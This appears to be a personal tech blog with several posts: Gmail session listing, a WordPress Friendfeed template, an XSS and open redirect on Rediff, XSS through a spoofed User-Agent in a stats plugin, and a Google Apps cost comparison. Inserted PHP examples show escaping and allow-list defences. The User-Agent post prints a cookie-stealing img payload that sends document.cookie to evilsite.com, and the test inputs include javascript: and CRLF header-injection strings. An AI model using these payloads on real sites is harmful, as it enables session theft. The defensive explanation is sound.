Jul 21

Google introduced a new feature in the Gmail service. Gmail now shows the last 5 access types and IP addresses that accessed the current account and lets you end sessions from other locations (where you might have ticked the remember-me option).

Seriously, this is one kick-ass feature I’ve been looking for in Gmail, and they’ve done it with a sweet add-on (I never expected the remote sign-off feature). For this feature, love you Google.

Don’t ask me why I’ve covered my IP address; I’ve no clue why I did that. Maybe because I usually find IP addresses and IDs concealed in screenshots.

Mar 28

Friendfeed is one great service which I’ve been using for a few days/weeks. So I thought I would publish my Friendfeed on this blog. Well, as usual, I have some requirements of my own. The requirement is that I don’t want to show it in my sidebar; I want to dedicate a page to it. So I need to take JSON/XML/RSS/Atom from Friendfeed and create HTML out of it. Obviously I have to either write JS to parse it client-side or a PHP script to parse it server-side. PHP was my choice, and I needed a way to execute PHP on a single page. There was one plugin named phpexec, but I wasn’t very comfortable (call it being paranoid) using that plugin.

So I used a small workaround. I created a template file feed.php and added

/*
Template Name: My Friendfeed
*/

Now WordPress thinks it’s a template and gives me the option of choosing it while creating pages. I created a page without any content, wrote all my PHP logic in feed.php, and now WordPress parses the template and gives me the required output. Anyway, you can download the code here. You have to extract the contents into your theme folder. By the way, you can see it working here.

Well, it’s a hack job. It works (only) for me. If you want to do the same, you have to edit the code according to your needs. It could have been done far more easily, but my stupid host has PHP 4 and I missed many features. And I had something else in mind (I thought of publishing the Friendfeed I follow, i.e., all my friends’ feeds) but later changed my mind. By the way, if you don’t know what Friendfeed is: in a nutshell, it is an aggregator of all the 2.0-ish services you might be using. Check it out if you want to know more; you won’t be disappointed.
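What such a template looks like, as an added example rather than the downloadable feed.php from the post (which is not on this page): the Template Name header makes WordPress offer the file in the page editor, an empty page is assigned to it, and the file itself fetches and renders the feed. It assumes PHP 5.2 or later for json_decode (which a PHP 4 host would not have), an assumed FriendFeed API URL, and a guessed entry shape (an "entries" array whose items carry "title" and "link"); the sample JSON at the bottom is constructed so the file also runs stand-alone from the command line. The security point is that feed content is third-party input landing in your page, so it is escaped on output and only http(s) links are turned into anchors.

```php
<?php
/*
Template Name: My Friendfeed
*/
// Added example, not the author's feed.php. Assumes PHP 5.2+ (json_decode) and a
// FriendFeed-style JSON document with an "entries" array of objects carrying
// "title" and "link"; that shape, the feed URL and the sample document below are
// assumptions / constructed for the demo.

function render_feed_entries($json) {
    $data = json_decode($json, true);
    if (!is_array($data) || !isset($data['entries']) || !is_array($data['entries'])) {
        return "<p>Feed unavailable.</p>\n";
    }
    $html = "<ul class=\"friendfeed\">\n";
    foreach ($data['entries'] as $entry) {
        $title = isset($entry['title']) ? (string)$entry['title'] : '';
        $link  = isset($entry['link'])  ? (string)$entry['link']  : '';
        // Feed content is third-party input: escape it, and only link http(s) URLs
        // so an entry cannot smuggle a javascript: URL into your page.
        if (!preg_match('#^https?://#i', $link)) {
            $link = '';
        }
        $safe_title = htmlspecialchars($title, ENT_QUOTES, 'UTF-8');
        if ($link !== '') {
            $safe_link = htmlspecialchars($link, ENT_QUOTES, 'UTF-8');
            $html .= "  <li><a href=\"$safe_link\">$safe_title</a></li>\n";
        } else {
            $html .= "  <li>$safe_title</li>\n";
        }
    }
    return $html . "</ul>\n";
}

function fetch_feed_json($url) {
    // Needs allow_url_fopen; returns null instead of emitting a warning on failure
    $body = @file_get_contents($url);
    return ($body === false) ? null : $body;
}

if (function_exists('get_header')) {
    // Running inside WordPress as the template of an (empty) page
    get_header();
    $json = fetch_feed_json('http://friendfeed.com/api/feed/user/USERNAME?format=json'); // assumed URL
    echo render_feed_entries($json === null ? '' : $json);
    get_footer();
} else {
    // Stand-alone run (php feed.php) on a constructed sample document
    $sample = '{"entries":[' .
        '{"title":"Read: <b>Hello</b> & welcome","link":"http://example.com/post/1"},' .
        '{"title":"Bad link","link":"javascript:alert(1)"}' .
        ']}';
    echo render_feed_entries($sample);
}
```

Run stand-alone, the first entry comes out with the bold tag and ampersand escaped and the second is rendered as plain text because its link fails the http(s) check. Inside WordPress the same function runs between get_header() and get_footer(), and the page's own (empty) content is never touched.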

PS: There is absolutely no reason why I haven’t blogged for more than a month. I wasn’t busy. It’s just that nothing has happened in my life to blog about. Absolutely nothing. Uhmm, wait, I’ve been to Coorg on an adventure trip. Nothing more than that.

Jan 19

Something more free from Rediff?
Hell yeah.

What’s that?
A URL redirection service.

Ads?
Come on, it’s Rediff; there will be ads.

What makes it different from other URL redirection services?
Other URL redirection services are built on purpose. Here, even Rediff doesn’t know that it has one too!!!

What?
Okay, in clear words: yet another stupid implementation by Rediff.

Where?
here - > http://www.rediff.com/login/inredirect.php?url=http://karteek.selfdabba.com

What does it do?
Arghh!!! Click on it!! -> K World

Wow. Anything more in it?
Uhmm, you want more, and Rediff will never say no. Yeah, it has XSS in it too.

Double wow. Show me, show me!!
Well, I can’t say no either. Click this.

Can I use it for anything more?
Hell, yeah. How about printing your name there on that page?

Triple wow. Show me, show me.
Dude, not going to show you this. But, yeah, I will give you a hint: document.write in JavaScript. And you know how to inject JavaScript into that page.

What? Do I?
Fck. That’s why I should have kept a disclaimer at the top that this post ain’t for everyone. XSS is Cross-Site Scripting: you inject JavaScript into another site’s page, and since the browser runs it as that site’s own script, it gets that site’s cookies and session.

Oh, okay. What do I do now?
Uhmm, how about a fair deal: I show you all the bugs I and others have found in Rediff, and you stop using it?

Yeah, I’m in.
Just go to Xssed.com and search for rediff. Lazy guys like me: click this.
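Both bugs above have the same root cause: a redirect script that takes a url parameter and trusts it, both as a redirect target and when it prints it back into the page. The following is an added example of how such an endpoint should behave; it is not Rediff’s inredirect.php. It only follows http(s) URLs whose host is on an allow-list of the site’s own hosts (so it is no longer an open redirector), refuses javascript: and other schemes, refuses CR/LF in the target so the Location header cannot be split, and HTML-escapes the parameter whenever it reflects it (which is where the XSS lives). The allow-list and the test inputs are constructed.

```php
<?php
// Added example, not Rediff's inredirect.php: a redirect endpoint that only
// follows targets on an allow-list of hosts and never reflects the raw URL.
// The allow-list and the sample inputs below are constructed for illustration.

function safe_redirect_target($url, array $allowed_hosts) {
    $url = trim((string)$url);
    $parts = parse_url($url);
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return null;                       // relative, empty or unparsable
    }
    // Only http/https; kills javascript:, data:, vbscript: and friends
    if (!in_array(strtolower($parts['scheme']), array('http', 'https'), true)) {
        return null;
    }
    // Exact host match against the allow-list
    if (!in_array(strtolower($parts['host']), $allowed_hosts, true)) {
        return null;
    }
    // Reject CR/LF so the Location header cannot be split
    if (preg_match('/[\r\n]/', $url)) {
        return null;
    }
    return $url;
}

function handle_redirect($raw_url, array $allowed_hosts) {
    $target = safe_redirect_target($raw_url, $allowed_hosts);
    if ($target === null) {
        // Never echo $raw_url unescaped: that is exactly where the reflected XSS is
        $shown = htmlspecialchars($raw_url, ENT_QUOTES, 'UTF-8');
        return array(400, "<p>Refusing to redirect to: $shown</p>");
    }
    return array(302, $target);   // caller emits header('Location: ' . $target)
}

// Stand-alone demonstration with constructed inputs
$allowed = array('www.rediff.com', 'rediff.com');
$cases = array(
    'http://www.rediff.com/news',                   // allowed
    'http://karteek.selfdabba.com',                 // open redirect: off-site host
    'javascript:alert(document.cookie)',            // scheme injection
    '"><script>alert(1)</script>',                  // reflected XSS attempt
    "http://www.rediff.com/x\r\nSet-Cookie: a=b",   // header injection
);
foreach ($cases as $c) {
    list($status, $body) = handle_redirect($c, $allowed);
    echo $status, ' ', $body, "\n";
}
```

Only the first case yields a 302; the rest come back as 400 with the offending value shown escaped. An exact-host allow-list is deliberately used instead of a substring check, since "contains rediff.com" is trivially bypassed with a host like rediff.com.evil.example.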

Nov 18

Well, it’s not just a funny way, but a very funny way. Neither through an HTTP GET nor an HTTP POST, but through a header. I hadn’t read about this method of XSS until now, but seriously, it’s silly and common. Webmasters usually read about the traffic to their websites, and Referer and User-Agent are very common headers they analyze to learn the type of visitors and which site they are coming from.

I just spoofed my User-Agent header to "<script>alert(1)</script>", and when I looked at the stats page afterwards, guess what: my stats plugin wasn’t sanitizing the input, and I got the alert window.

Now, going back to fix and report it. Take care when looking at your stats (especially in WordPress). Rather than a mere alert, one can plant something like this:

<img
src="javascript:document.images[1].src=%22http://evilsite.com/cookie.php?c%3D+document.cookie;"
style=visibility:hidden />

The above code will send the cookie to the cookie.php page on evilsite.com; the hacker can collect the cookies there with a very simple script and become you just by replaying them (provided the session cookie is not marked HttpOnly). This particular vector relies on the browser executing a javascript: URL in an img src, which old browsers such as IE 6 did and current browsers refuse; a plain <script> tag, as in the User-Agent above, works regardless. This page has many vectors to use. It doesn’t teach you how to use them, so if you really know what you have to do, you must know that page already.

Result: check your stats plugins and make sure that they sanitize all inputs, request headers included. Just don’t trust them. They can be very dangerous. Finishing yet another episode of “How do THEY do it?”
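What the bug and its fix look like in a stats plugin, as an added example that is not the author’s plugin or their patch: the same stats table rendered the vulnerable way (headers dropped straight into the HTML) and the hardened way (every header value escaped, and only http(s) referers turned into links), fed by constructed log rows that include the spoofed User-Agent from this post, plus a small check that flags rows carrying markup so you can spot the attempt in the log itself. The field names and table layout are assumptions.

```php
<?php
// Added example, not the author's stats plugin: the same stats table rendered
// the vulnerable way and the hardened way. The log rows are constructed; a real
// plugin would read them from its database table.

$visits = array(
    array('ip' => '203.0.113.5', 'ua' => 'Mozilla/5.0 (X11; Linux) Firefox/2.0',
          'referer' => 'http://www.google.com/search?q=wordpress+stats'),
    // the spoofed header from the post
    array('ip' => '198.51.100.7', 'ua' => '<script>alert(1)</script>',
          'referer' => ''),
    // javascript: smuggled through the Referer, which a naive plugin turns into a link
    array('ip' => '198.51.100.8', 'ua' => 'curl/7.16.0',
          'referer' => 'javascript:alert(document.cookie)'),
);

// VULNERABLE: trusts the headers because "the browser sent them"
function render_stats_vulnerable(array $visits) {
    $out = "<table>\n";
    foreach ($visits as $v) {
        $out .= "<tr><td>{$v['ip']}</td><td>{$v['ua']}</td>"
              . "<td><a href=\"{$v['referer']}\">{$v['referer']}</a></td></tr>\n";
    }
    return $out . "</table>\n";
}

// Hardened: every header value is attacker-controlled text, so escape on output
function h($s) {
    return htmlspecialchars((string)$s, ENT_QUOTES, 'UTF-8');
}

function safe_referer_link($referer) {
    $r = trim((string)$referer);
    if ($r === '') {
        return '';
    }
    // Link only http(s) referers; anything else is shown as inert text
    if (preg_match('#^https?://#i', $r)) {
        return '<a href="' . h($r) . '" rel="nofollow">' . h($r) . '</a>';
    }
    return h($r);
}

function render_stats_hardened(array $visits) {
    $out = "<table>\n";
    foreach ($visits as $v) {
        $out .= '<tr><td>' . h($v['ip']) . '</td><td>' . h($v['ua']) . '</td>'
              . '<td>' . safe_referer_link($v['referer']) . "</td></tr>\n";
    }
    return $out . "</table>\n";
}

// Cheap detector for the log itself: flag rows that look like markup or script
function suspicious_header($value) {
    return (bool)preg_match('/<|>|javascript:|vbscript:|data:/i', (string)$value);
}

echo "--- vulnerable ---\n", render_stats_vulnerable($visits);
echo "--- hardened ---\n",   render_stats_hardened($visits);
foreach ($visits as $v) {
    if (suspicious_header($v['ua']) || suspicious_header($v['referer'])) {
        echo "suspicious row from {$v['ip']}\n";
    }
}
```

In the vulnerable output the second row contains a live script tag and the third row a clickable javascript: link; in the hardened output both appear as harmless text. Escaping is done at output time rather than when the row is stored, so the raw value stays in the log for forensics; the same rows should of course be written with prepared statements, since a header that carries quotes is just as happy to attack the INSERT as the page.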

Nov 18

[The following information is collected from various sources, believe at your own risk]

Google made it easier for companies to migrate their legacy email systems to Google Apps by offering an Email Migration API. This is what Google says about the API:

The Email Migration API enables you to migrate email from any data source into Google Apps. You can write extraction code which operates against an email server data store, interface protocol, or email client data store, then, using this API, upload the email messages to a target mailbox, specifying the correct labels, date, and status. The Email Migration API supports both end user tools and administrative tools. This API is only available in Google Apps Premier, Education and Partner Editions.

The new migration tool will move email from any system, including Outlook or any type of server, to Google Apps (all editions other than the free one).

In releasing the new API, Google appears to understand that any mid- or large-sized company would be reluctant to rip and replace its current e-mail server with another system. However, by allowing a company to run both systems concurrently, Google may have ameliorated a major concern [1]

In order to convince mid- or large-sized companies, they are currently offering Postini for free, which assures safety. They have indeed proved that large companies can trust them by making Capgemini a customer.

Google has got a complete “army” of tools for Google Apps to fight Microsoft Exchange, Lotus Domino or any other email solution. If you take a look at the Google Apps Solutions page, they list solutions category-wise which will do your work at some price if you are not willing to invest money in developing something using the released APIs.

A small survey of available solutions and costs

Google Apps Premier Edition, which includes Gmail (25 GB mailbox with IMAP and POP support), Google Talk, Google Calendar, Google Docs, Page Creator and Start Page, policy management and message recovery by Postini, SSO, migration, user provisioning and management, email gateway support etc., costs $50/user/year.

According to a source, a similar service on Microsoft Exchange Hosted Services costs around $23/user/month. Overall, there is a huge cost difference. Big companies might prefer in-house services rather than outsourcing their email to other hosts. Companies like Accenture and Wipro migrated a while ago from Lotus Notes to Microsoft Exchange to reduce cost, enhance security and for some other added advantages. However, I couldn’t get much data on cost per user for Exchange and Lotus, but as per this report, an in-house deployment of Exchange costs around $438 per user per 3 years and IBM’s solution costs $406 per user per 3 years.

These are the results. (I’m damn sure that they aren’t correct, but at least they might give you an idea. The cost of in-house solutions includes hardware and running costs; software-only costs are just the licensing costs.) However, the mailbox sizes differ: Google Apps gives 25 GB, while the rest are under 500 MB or reach a maximum of 3.6 GB per box.

Solution / Type           Cost per user per year
Exchange / In-House       $146
Lotus / In-House          $135
Exchange / Hosted         $100-$300 (services dependent)
Google / Hosted           $50
Exchange / Software Only  $73
Lotus / Software Only     $50

Apart from some disadvantages, Google Apps looks like a very good option. Good luck, Google. Who could have expected a search engine to start a webmail service with a gigabyte mailbox, scare every other webmail provider, slowly convert it into a collaboration suite, offer it to enterprise customers for a decent price and scare the companies that have been in this business for a long time? Well, I’ve done some work which is not quite my type of research. Now, going back to read about those APIs.